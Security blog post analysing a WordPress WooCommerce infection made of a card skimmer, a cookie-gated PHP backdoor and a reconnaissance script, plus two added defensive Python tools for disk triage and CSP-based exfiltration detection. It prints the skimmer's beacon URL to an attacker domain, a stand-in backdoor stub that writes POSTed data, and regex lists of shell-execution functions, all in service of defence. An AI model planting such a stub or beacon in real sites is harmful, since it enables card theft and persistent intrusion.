Credit Card Skimmer and Backdoor on WordPress E-commerce Site
=============================================================

By [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava), March 14, 2025

The battle against e-commerce malware continues to intensify, with attackers deploying increasingly sophisticated tactics. In a recent case at Sucuri, a customer reported suspicious files and unexpected behavior on their WordPress site. Deeper analysis revealed an infection made of several components working together as a coordinated attack: a credit card skimmer, a hidden backdoor file manager, and a reconnaissance script.

What Did We See?
----------------

The customer initially contacted us after noticing unknown files on their server and experiencing intermittent issues with their checkout process. Their customers had also reported unusual activity on their credit cards shortly after making purchases on the site.

Our investigation revealed a malware attack specifically designed for WordPress WooCommerce websites, indicating a focus on e-commerce platforms. The combination of credit card skimming and remote file management suggests a multifaceted attack aimed at both financial gain and long-term control.

The infection involved three distinct malicious components affecting multiple areas within the WordPress installation:

* A heavily obfuscated JavaScript credit card skimmer injected into the checkout page.
* A hidden PHP file manager backdoor disguised as a WordPress core file.
* An information-gathering reconnaissance script placed in a location typically used for WordPress core files, designed to verify the infection status and gather server information.

Analysis of the Malicious Components
------------------------------------

### Code 1: PHP-based File Manager

One of the most dangerous files we found was a PHP shell, which might have allowed attackers to run system commands remotely. This type of malware is often used to upload additional payloads, modify files, and execute arbitrary commands.

This [backdoor](https://blog.sucuri.net/2025/01/backdoors-the-hidden-threat-lurking-in-your-website.html) implements several features:

* **Cookie-based authentication:** The file manager is hidden by default and only appears when a specific cookie is present. Without the cookie the script returns nothing, so a scanner that fetches the URL over HTTP sees an empty page; the file has to be found on disk.
* **Complete filesystem access:** Functions to list, create, edit, delete, and upload files.
* **Directory traversal:** Ability to navigate throughout the server's filesystem, limited only by the permissions of the web server user.
* **Timestamp manipulation:** The 'touch' feature allows attackers to set file modification times so the implant blends in with legitimate core files in any listing sorted by mtime. Note that touch rewrites mtime only; the inode change time (ctime) is set to the current time by the kernel and cannot be backdated from userland, so a large ctime/mtime gap on a file that should not exist is a useful corroborating sign.

### Code 2: Credit Card Skimmer

The payload was a JavaScript skimmer designed to steal customer payment information during checkout. The code was heavily obfuscated to avoid detection.

After deobfuscation, we determined the script's functionality:

* **Anti-debugging measures:** The script includes code to detect whether developer tools are open, hindering analysis.
* **Checkout-page trigger:** The script only activates on the checkout page.
* **Form field monitoring:** It collects data from the CyberSource payment fields and the billing information.
* **Data exfiltration:** It encodes the stolen data and sends it to the attacker's server using a fake image request.

The most revealing part of the code is the data exfiltration mechanism. The script waits for user clicks on the checkout page, collects the credit card number, expiration date, security code, and all billing information, then encodes it and sends it to `imageresizefix[.]com` disguised as an image request:

```
https://imageresizefix[.]com/pixel_info/img-sort.php?validator=ENCODED_DATA
```

Because this request is an image load issued by the shopper's browser directly to the attacker's host, it never passes through the merchant's server and leaves no trace in the site's own access logs; the only server-side evidence is the injected script itself.

### Code 3: API-Driven Surveillance

The third component was a reconnaissance script designed to verify the infection and gather information about the WordPress installation. It checked for the existence of an admin user ID and searched for specific strings within files, which allowed the attackers to monitor their presence and the site's status.

### Indicators of Compromise (IOCs)

We found that the malware was communicating with the following:

* **Malicious IPs:** `104.194.151.47` and `185.247.224.241`
* **Malicious domains:** `imageresizefix[.]com` and `imageinthebox[.]com`

These have now been blocklisted by Sucuri to prevent further infections.

Motive Behind the Attack
------------------------

The advanced nature of this attack indicates a financially motivated cybercriminal group specifically targeting e-commerce sites. Their objectives were likely:

* **Financial gain:** The primary goal was to harvest credit card data for fraud or for sale on dark web marketplaces.
* **Persistent access:** The backdoor allowed long-term access to the server for ongoing exploitation.
* **Platform for further attacks:** The compromised server could be used to host malware or attack other sites.

Impact of the Malware
---------------------

The impact of this malware could be severe:

* **Financial loss:** Stolen credit card data can lead to significant losses for both the business and its customers.
* **Reputational damage:** A data breach can severely damage a business's reputation and customer trust.
* **Potential PCI compliance violations:** The breach may have put the merchant out of compliance with the Payment Card Industry Data Security Standard (PCI DSS).
* **Loss of control:** The remote file manager allowed attackers to manipulate the site, potentially disrupting operations or causing data loss.
* **SEO damage:** Malware can inject spam links and content, harming the site's search engine rankings.

Mitigation and Prevention
-------------------------

* **Immediate malware removal:** Conduct a thorough scan and removal of all malicious code.
* **Password resets:** Reset all passwords for administrative accounts and database access.
* **File integrity monitoring:** Implement file integrity monitoring to detect unauthorized file modifications and files that do not belong to the installed release.
* **Web Application Firewall (WAF):** Deploy a WAF to block malicious requests and prevent future attacks.
* **Regular security audits:** Conduct regular security audits to identify and address vulnerabilities.
* **Plugin and theme updates:** Keep all plugins and themes up to date.
* **Payment gateway security:** Ensure the payment gateway is configured securely and kept up to date.
* **Blocklisting:** The IPs and domains mentioned above are now blocklisted by Sucuri.
* **Two-factor authentication (2FA):** Enforce 2FA for all administrative accounts.
* **Least privilege principle:** Limit user permissions to only what is necessary.

Conclusion
----------

This case demonstrates the evolving complexity of attacks targeting e-commerce platforms. The combination of credit card skimming, backdoor access, and reconnaissance capabilities shows a well-organized operation focused on long-term exploitation.

Site owners should implement strict security measures for their e-commerce platforms, particularly around payment processing. Regular security scans, proper access controls, and timely updates are essential to prevent these types of attacks.

Sucuri has added detection signatures for this malware strain to our scanning and firewall products to protect our customers from similar attacks. For professional malware removal and security hardening, visit [Sucuri.net](https://sucuri.net/).

##### [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava)

Puja Srivastava is a Security Analyst with a passion for fighting new and undetected malware threats. With over 7 years of experience in the field of malware research and security, Puja has honed her skills in detecting, monitoring, and cleaning malware from websites. Her responsibilities include website malware remediation, training, cross-training and mentoring new recruits and analysts from other departments, and handling escalations.
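The backdoor (Code 1) and the reconnaissance script (Code 3) both hid in WordPress core directories, and the file manager's touch feature existed to defeat triage by modification time. The script below is an added example of the disk-side check a responder would run, not Sucuri's tooling and not code recovered from this incident: it compares every PHP file under wp-admin/ and wp-includes/ against a release manifest, flags cookie-gated code that carries file-management primitives, and uses the ctime/mtime gap as corroboration that a timestamp was set by hand. The directory tree, the manifest, and the two rogue file names (`class-wp-file-manager.php`, `check-status.php`) are constructed for the demo.

```python
"""Disk-side triage for the implants described above: PHP files that sit in
WordPress core directories without belonging to the release, cookie-gated
code carrying file-management primitives, and timestamps backdated with
touch(). Added example; not Sucuri's tooling and not code from the incident.

The site tree and the "known-good" manifest are constructed inline, and the
two rogue file names are invented. In a real run the manifest comes from the
checksums WordPress publishes for the installed version
(https://api.wordpress.org/core/checksums/1.0/?version=VER&locale=en_US,
which are MD5 digests, so swap the hash function to match).
"""
import hashlib
import os
import re
import tempfile
import time
from pathlib import Path

CORE_DIRS = {"wp-admin", "wp-includes"}

# Shape of the file manager in this case: inert until a cookie is present,
# then reads/writes the filesystem. Heuristic only; treat hits as leads.
COOKIE_GATE = re.compile(r"\$_COOKIE\s*\[")
FILE_PRIMITIVES = re.compile(
    r"\b(file_put_contents|move_uploaded_file|touch|unlink|rename|scandir|"
    r"eval|system|shell_exec|passthru|exec)\s*\("
)


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def triage(root: Path, manifest: dict, backdate_seconds: int = 7 * 86400) -> list:
    """Return sorted (relative_path, reason) tuples for PHP files under root.

    manifest maps release-relative paths such as 'wp-includes/version.php'
    to the sha256 of the pristine file.
    """
    findings = []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        expected = manifest.get(rel)
        suspicious = False
        if rel.split("/", 1)[0] in CORE_DIRS and expected is None:
            findings.append((rel, "unknown file in core directory"))
            suspicious = True
        elif expected is not None and sha256_of(path) != expected:
            findings.append((rel, "core file modified"))
            suspicious = True
        text = path.read_text(errors="replace")
        if COOKIE_GATE.search(text) and FILE_PRIMITIVES.search(text):
            findings.append((rel, "cookie-gated code with file primitives"))
            suspicious = True
        # touch()/utime() rewrite mtime, but the kernel stamps ctime with the
        # current time and exposes no call to backdate it. On a file that is
        # already suspicious, an mtime far older than its ctime means someone
        # dressed it up to look old. Pristine core files unpacked from the
        # release archive also carry old mtimes, so this only corroborates.
        st = path.stat()
        if suspicious and st.st_ctime - st.st_mtime > backdate_seconds:
            findings.append((rel, "mtime backdated relative to ctime"))
    return sorted(findings)


def build_demo_site() -> tuple:
    """Write a constructed WordPress tree to a temp dir; return (root, manifest)."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    pristine_index = "<?php\nrequire_once __DIR__ . '/admin.php';\n"
    files = {
        "wp-includes/version.php": "<?php\n$wp_version = '6.7.2';\n",
        # Simulated tampering: on-disk copy differs from the release.
        "wp-admin/index.php": pristine_index + "include '/tmp/x.php';\n",
        # Constructed stand-in for the recon script: core path, not in release.
        "wp-admin/includes/check-status.php":
            "<?php\necho json_encode(['admin' => (bool) get_userdata(1)]);\n",
        # Constructed stand-in for the file manager: cookie gate + file writes.
        "wp-includes/class-wp-file-manager.php":
            "<?php\nif (!isset($_COOKIE['fm_auth'])) { exit; }\n"
            "file_put_contents($_POST['f'], $_POST['d']);\n"
            "touch($_POST['f'], (int) $_POST['t']);\n",
        # Ordinary plugin file outside core: no manifest entry, not flagged.
        "wp-content/plugins/shop-extras/shop-extras.php":
            "<?php\n/* Plugin Name: Shop Extras */\n",
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    manifest = {
        "wp-includes/version.php": sha256_of(root / "wp-includes/version.php"),
        "wp-admin/index.php": hashlib.sha256(pristine_index.encode()).hexdigest(),
    }
    # Backdate the file manager by about 400 days, as its touch feature would.
    old = time.time() - 400 * 86400
    os.utime(root / "wp-includes/class-wp-file-manager.php", (old, old))
    return root, manifest


def demo() -> list:
    root, manifest = build_demo_site()
    return triage(root, manifest)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:40} {rel}")
```

The manifest comparison is the same idea as WP-CLI's `wp core verify-checksums`; the content and timestamp heuristics are what that command does not give you, and they are what separates a cookie-gated implant from a stray but harmless file.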
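The exfiltration request described under Code 2 goes from the shopper's browser straight to the attacker's host, so the store's own logs never see it. A Content-Security-Policy on the checkout page that restricts where images may load from turns that beacon into a violation report the store does receive. The block below is an added example, not configuration or code from the incident or from Sucuri: it builds the header and triages the browser's reports. The allowlist, the report endpoint path and the three sample reports are constructed; the blocked host in the first sample is the domain from the IOC list. It also covers `connect-src` and `form-action`, since skimmers exfiltrate over fetch/XHR and form posts as well as image loads, which goes beyond the mechanism seen in this case.

```python
"""Catch the skimmer's image-beacon exfiltration from the merchant's side.

The beacon is a GET from the shopper's browser straight to the attacker's
host, so the store's access logs never see it. A Content-Security-Policy on
the checkout page that limits img-src/connect-src/form-action to known
hosts turns that request into a violation report the store does receive
(report-only for visibility, enforced to block it outright).

Added example, not configuration or code from the incident or from Sucuri.
The allowlist, report path and sample reports are constructed; the blocked
host in the first report is the domain from the IOC list.
"""
import json
from urllib.parse import urlparse

# Hosts the checkout page legitimately loads from. Constructed; in practice
# every gateway iframe, analytics and tag-manager host must be listed here.
CHECKOUT_ALLOWLIST = {"shop.example", "secureacceptance.cybersource.com"}

# Directives through which stolen form data can leave the page: image
# loads (this case), fetch/XHR, and form submissions.
EXFIL_DIRECTIVES = {"img-src", "connect-src", "form-action"}


def checkout_csp_header(allowed_hosts, report_only=True, report_path="/csp-report"):
    """Return the (header_name, header_value) pair for the checkout page."""
    hosts = " ".join(sorted(f"https://{h}" for h in allowed_hosts))
    policy = (
        f"default-src 'self'; "
        f"img-src 'self' data: {hosts}; "
        f"connect-src 'self' {hosts}; "
        f"form-action 'self' {hosts}; "
        f"report-uri {report_path}"
    )
    name = "Content-Security-Policy-Report-Only" if report_only else "Content-Security-Policy"
    return name, policy


def classify_report(body, allowed_hosts):
    """Parse one report POST body; return a finding dict, or None if benign.

    Benign here means: a directive that cannot carry data out, an allowlisted
    host, a non-network URI such as 'inline', or a page other than checkout.
    """
    report = json.loads(body).get("csp-report", {})
    raw = report.get("effective-directive") or report.get("violated-directive") or ""
    directive = raw.split()[0] if raw.split() else ""
    blocked = report.get("blocked-uri", "")
    page = report.get("document-uri", "")
    # Browsers may report only the origin of a cross-origin resource, so key
    # the decision on the host, never on the path or query.
    host = urlparse(blocked).hostname if "://" in blocked else None
    if directive not in EXFIL_DIRECTIVES or host is None or host in allowed_hosts:
        return None
    if "/checkout" not in urlparse(page).path:
        return None
    return {"host": host, "directive": directive, "page": page,
            "source": report.get("source-file", "")}


def triage_reports(bodies, allowed_hosts):
    return [f for f in (classify_report(b, allowed_hosts) for b in bodies) if f]


# Constructed report bodies in the shape browsers POST to report-uri.
SAMPLE_REPORTS = [
    # The skimmer's beacon: a cross-origin "image" requested from checkout.
    json.dumps({"csp-report": {
        "document-uri": "https://shop.example/checkout/",
        "effective-directive": "img-src",
        "violated-directive": "img-src",
        "blocked-uri": "https://imageresizefix.com",
        "source-file": "https://shop.example/checkout/",
        "status-code": 200,
    }}),
    # Noise: a font blocked on a product page, not an exfil path.
    json.dumps({"csp-report": {
        "document-uri": "https://shop.example/product/widget/",
        "effective-directive": "font-src",
        "blocked-uri": "https://fonts.gstatic.com",
    }}),
    # Noise: inline style on checkout (CSP2-style violated-directive text).
    json.dumps({"csp-report": {
        "document-uri": "https://shop.example/checkout/",
        "violated-directive": "style-src 'self'",
        "blocked-uri": "inline",
    }}),
]


def demo():
    return triage_reports(SAMPLE_REPORTS, CHECKOUT_ALLOWLIST)


if __name__ == "__main__":
    print(*checkout_csp_header(CHECKOUT_ALLOWLIST), sep=": ")
    for finding in demo():
        print(f"possible exfil to {finding['host']} via {finding['directive']} on {finding['page']}")
```

Start in report-only mode: a WooCommerce checkout loads gateway iframes, analytics and tag managers, and every one of them has to be in the allowlist before the policy is enforced, or the policy itself will break checkout. `report-uri` is deprecated in favor of `report-to` but is still honored by current browsers and needs no separate Reporting-Endpoints header, which keeps the example self-contained.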